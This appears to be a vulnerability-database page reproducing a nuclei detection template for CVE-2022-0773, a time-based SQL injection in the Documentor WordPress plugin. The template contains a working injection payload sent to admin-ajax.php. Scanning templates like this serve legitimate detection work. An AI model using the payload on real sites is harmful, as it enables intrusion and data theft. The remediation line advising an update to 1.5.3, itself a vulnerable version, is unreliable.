Lucene search
K

Documentor <= 1.5.3 - Unauthenticated SQL Injection

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Documentor <= 1.5.3 - Unauthenticated SQL Injection. Allows execution of arbitrary SQL queries and potential unauthorized access, data leakage, or data manipulation. Remediate by updating to version 1.5.3 or later

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-0773
2 May 202220:28
circl
CNNVD
WordPress plugin Documentor SQL注入漏洞
2 May 202200:00
cnnvd
CNVD
WordPress Documentor plugin SQL注入漏洞
7 May 202200:00
cnvd
Check Point Advisories
WordPress Documentor Plugin SQL Injection (CVE-2022-0773)
30 May 202200:00
checkpoint_advisories
CVE
CVE-2022-0773
2 May 202216:05
cve
Cvelist
CVE-2022-0773 Documentor <= 1.5.3 - Unauthenticated SQLi
2 May 202216:05
cvelist
NVD
CVE-2022-0773
2 May 202216:15
nvd
Patchstack
WordPress Documentor plugin <= 1.5.3 - Unauthenticated SQL Injection (SQLi) vulnerability
5 Apr 202200:00
patchstack
Prion
Sql injection
2 May 202216:15
prion
RedhatCVE
CVE-2022-0773
22 May 202523:28
redhatcve
Rows per page
id: CVE-2022-0773

info:
  name: Documentor <= 1.5.3 - Unauthenticated SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Update to Documentor version 1.5.3 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/55b89de0-30ed-4f98-935e-51f069faf6fc
    - https://wordpress.org/plugins/documentor-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0773
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0773
    cwe-id: CWE-89
    epss-score: 0.75526
    epss-percentile: 0.98915
    cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: documentor_project
    product: documentor
    framework: wordpress
  tags: time-based-sqli,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)
      - |
        GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
        condition: and
# digest: 4a0a00473045022064150d0b4d9fd789fe521bfcbb6e283020cd522fb6dcb68aca7b26e76101c220022100ea480a6b3756b05ab15969a0c493765242f759ac8f1455df7fec68f94ecf89bb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.75526
14